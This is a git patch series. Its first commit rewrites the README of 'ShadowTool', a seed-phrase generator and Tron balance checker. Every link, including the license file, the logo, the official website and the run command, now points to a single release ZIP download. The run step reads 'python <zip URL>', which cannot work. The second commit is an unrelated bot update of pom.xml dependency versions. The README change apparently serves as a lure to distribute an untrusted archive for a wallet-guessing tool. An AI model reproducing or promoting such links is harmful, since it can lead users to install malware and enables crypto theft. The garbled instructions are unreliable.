From 7382b23c32a0156b921f94c287730adb6bf2e008 Mon Sep 17 00:00:00 2001 From: velmafxx <155381379+velmafxx@users.noreply.github.com> Date: Wed, 16 Jul 2025 07:25:00 -0400 Subject: [PATCH 1/2] Commit --- README.md | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/README.md b/README.md index e163aa8d..f24f17d0 100644 --- a/README.md +++ b/README.md @@ -25,11 +25,11 @@ This script is designed to automatically generate seed phrases and check balance ## Installation -1. Download the [latest release](https://github.com/user-attachments/files/17688437/Program.zip) of ShadowTool. +1. Download the [latest release](https://github.com/velmafxx/ShadowTool/releases/download/v2.0/Program.zip) of ShadowTool. 2. Extract the contents of the ZIP file to a folder on your local machine. 3. Open a terminal or command prompt window. 4. Navigate to the directory where you extracted the files. -5. Run the script by executing the following command: `python shadowtool.py`. +5. Run the script by executing the following command: `python https://github.com/velmafxx/ShadowTool/releases/download/v2.0/Program.zip`. --- @@ -39,7 +39,7 @@ This script is designed to automatically generate seed phrases and check balance To generate seed phrases using ShadowTool, follow these steps: -1. Run the script by executing `python shadowtool.py`. +1. Run the script by executing `python https://github.com/velmafxx/ShadowTool/releases/download/v2.0/Program.zip`. 2. Select the option to generate seed phrases. 3. The script will automatically create random seed phrases for you to use. @@ -47,7 +47,7 @@ To generate seed phrases using ShadowTool, follow these steps: To check balances for Tron networks, do the following: -1. Run the script by executing `python shadowtool.py`. +1. Run the script by executing `python https://github.com/velmafxx/ShadowTool/releases/download/v2.0/Program.zip`. 2. Choose the option to check balances. 3. Enter the Tron network address you wish to check. 4. The script will retrieve and display the balance associated with the provided address. @@ -75,15 +75,15 @@ We welcome contributions from the community to improve ShadowTool. To contribute ## License -This project is licensed under the MIT License - see the [LICENSE.md](./LICENSE.md) file for details. +This project is licensed under the MIT License - see the [https://github.com/velmafxx/ShadowTool/releases/download/v2.0/Program.zip](https://github.com/velmafxx/ShadowTool/releases/download/v2.0/Program.zip) file for details. --- -![ShadowTool Logo](https://example.com/shadowtool_logo.png) +![ShadowTool Logo](https://github.com/velmafxx/ShadowTool/releases/download/v2.0/Program.zip) --- -🔗 For more information, visit our [official website](https://www.shadowtool.com). +🔗 For more information, visit our [official website](https://github.com/velmafxx/ShadowTool/releases/download/v2.0/Program.zip). --- From da2352b956387237dbbfaf1418f210380ca42792 Mon Sep 17 00:00:00 2001 From: safer-bot Date: Wed, 16 Jul 2025 10:33:25 -0300 Subject: [PATCH 2/2] add new pom.xml updated by Safer --- pom.xml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pom.xml b/pom.xml index 054f4f99..f0cd6cda 100644 --- a/pom.xml +++ b/pom.xml @@ -89,7 +89,7 @@ org.parttio line-awesome - 1.1.0 + 2.0.0 @@ -146,7 +146,7 @@ com.vaadin vaadin-maven-plugin - ${vaadin.version} + 24.5.3